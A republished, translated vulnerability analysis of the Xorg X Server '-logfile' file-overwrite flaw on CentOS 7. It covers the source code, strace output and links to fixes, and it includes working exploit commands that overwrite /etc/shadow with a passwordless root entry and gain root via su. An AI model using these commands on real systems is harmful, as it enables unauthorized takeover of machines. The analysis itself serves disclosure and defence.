2025-04-06 Update From: SLTechnology News&Howtos (Network Security)
Shulou (Shulou.com) 05/31 Report
What is the Xorg X Server privilege escalation vulnerability? Many inexperienced readers are at a loss about it, so this article summarizes the cause of the problem and its fix. I hope it helps you resolve the issue.
Privilege escalation vulnerability caused by arbitrary file overwrite
Translated by Hetian Wangan Laboratory
Description:
The X.org X Server allows low-privileged users to create or overwrite files anywhere on the system, including sensitive files such as /etc/shadow.
Attack precondition: a console session as an ordinary (unprivileged) user
Target machine:
CentOS-7
[narendra@localhost]$ uname -a
Linux localhost.localdomain 4.18.11-1.el7.elrepo.x86_64 #1 SMP Sat Sep 29 09:42:38 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
X.Org X server version: 1.19.5
Analysis:
On CentOS and Red Hat server systems, the X.org X Server executable (/usr/bin/Xorg) is installed with the setuid bit and is owned by root.
[Dev@localhost ~]$ ls -la /usr/bin/Xorg
-rwsr-xr-x. 1 root root 2409344 Apr 11 22:12 /usr/bin/Xorg
The LogInit() function initializes logging for the X.org X Server, and the server lets the user choose the log file with the "-logfile" option.
If a file with the user-provided name already exists on the system, it is first renamed to "<name>.old". A new file with the user-provided name is then created by calling fopen():
xorg-server/os/log.c

    const char *
    LogInit(const char *fname, const char *backup)
    {
        char *logFileName = NULL;

        if (fname && *fname) {
            if (displayfd != -1) {
                /* Display isn't set yet, so we can't use it in filenames yet. */
                char pidstring[32];
                snprintf(pidstring, sizeof(pidstring), "pid-%ld",
                         (unsigned long) getpid());
                logFileName = LogFilePrep(fname, backup, pidstring);
                saved_log_tempname = logFileName;

                /* Save the patterns for use when the display is named. */
                saved_log_fname = strdup(fname);
                if (backup == NULL)
                    saved_log_backup = NULL;
                else
                    saved_log_backup = strdup(backup);
            } else
                logFileName = LogFilePrep(fname, backup, display);
            /* "w" truncates: whatever already exists at logFileName is overwritten */
            if ((logFile = fopen(logFileName, "w")) == NULL)
                FatalError("Cannot open log file \"%s\"\n", logFileName);
            setvbuf(logFile, NULL, _IONBF, 0);

            logFileFd = fileno(logFile);
The strace command shows the open() system call that fopen() issues underneath:
stat("mylogfile", 0x7ffcb9654ed0) = -1 ENOENT (No such file or directory)
open("mylogfile", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
rt_sigaction(SIGALRM, {0x55b6e2c2ca70, [ALRM], SA_RESTORER|SA_RESTART, 0x7fb0353036d0}, NULL, 8) = 0
As the trace shows, the O_EXCL flag is not set and O_TRUNC is, so fopen() either creates the file or truncates and overwrites an existing one.
Vulnerability exploitation:
The exploit relies on the following three facts:
1. The file name passed to the fopen() call is controlled by the user.
2. fopen() creates the file or overwrites an existing one.
3. The executable /usr/bin/Xorg is setuid root.
/etc/shadow file overwrite test
[Dev@localhost ~]$ uname -r
3.10.0-862.el7.x86_64
[Dev@localhost ~]$ Xorg -version

X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 2.6.32-696.18.7.el6.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8
Build Date: 13 February 2018 02:39:52PM
Build ID: xorg-x11-server 1.19.5-5.el7
Current version of pixman: 0.34.0
	Before reporting problems, check http://wiki.x.org
	to make sure that you have the latest version.
[Dev@localhost ~]$
[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$ ls -la shadow
----------. 1 root root 1650 Oct  6 05:03 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow
cat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -logfile shadow :1    # specify the log file as shadow

X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 2.6.32-696.18.7.el6.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8
Build Date: 13 February 2018 02:39:52PM
Build ID: xorg-x11-server 1.19.5-5.el7
Current version of pixman: 0.34.0
	Before reporting problems, check http://wiki.x.org
	to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
	(++) from command line, (!!) notice, (II) informational,
	(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "shadow", Time: Sat Oct  6 21:54:13 2018
(==) Using config directory: "/etc/X11/xorg.conf.d"
(==) Using system config directory "/usr/share/X11/xorg.conf.d"
^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)
(II) Server terminated successfully (0). Closing log file.
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow
-rw-r--r--. 1 root Dev 53901 Oct  6 21:54 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ head shadow    # written successfully
[11941.870]
X.Org X Server 1.19.5
Release Date: 2017-10-12
[11941.870] X Protocol Version 11, Revision 0
[11941.870] Build Operating System: 2.6.32-696.18.7.el6.x86_64
[11941.870] Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64
[11941.870] Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8
[11941.870] Build Date: 13 February 2018 02:39:52PM
[11941.870] Build ID: xorg-x11-server 1.19.5-5.el7
[11941.870] Current version of pixman: 0.34.0
[Dev@localhost etc]$
Privilege escalation
[Dev@localhost ~]$ id    # current permissions
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow
----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow    # check permissions
cat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1    # write the entry into the file; root has no password

X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.14.4.el7.x86_64 root=/dev/mapper/centos-root ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8
Build Date: 11 April 2018 04:40:54PM
Build ID: xorg-x11-server 1.19.5-5.el7
Current version of pixman: 0.34.0
	Before reporting problems, check http://wiki.x.org
	to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
	(++) from command line, (!!) notice, (II) informational,
	(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "shadow", Time: Wed Oct 10 01:16:10 2018
(==) Using config directory: "/etc/X11/xorg.conf.d"
(==) Using system config directory "/usr/share/X11/xorg.conf.d"
^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)
(II) Server terminated successfully (0). Closing log file.
[Dev@localhost etc]$ ls -la shadow
-rw-r--r--. 1 root Dev 53897 Oct 10 01:16 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow | grep "root::"    # the entry was written successfully
root::16431:0:99999:7:::
[Dev@localhost etc]$
[Dev@localhost etc]$ su    # switch to the root user
[root@localhost etc]#
[root@localhost etc]# id    # check permissions: escalation succeeded
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Fix information:
https://lists.x.org/archives/xorg-announce/2018-October/002927.html
https://lists.x.org/archives/xorg-announce/2018-October/002928.html
After reading the above, have you understood the Xorg X Server privilege escalation vulnerability? If you want to learn more skills or find out more about it, you are welcome to follow the industry information channel. Thank you for reading!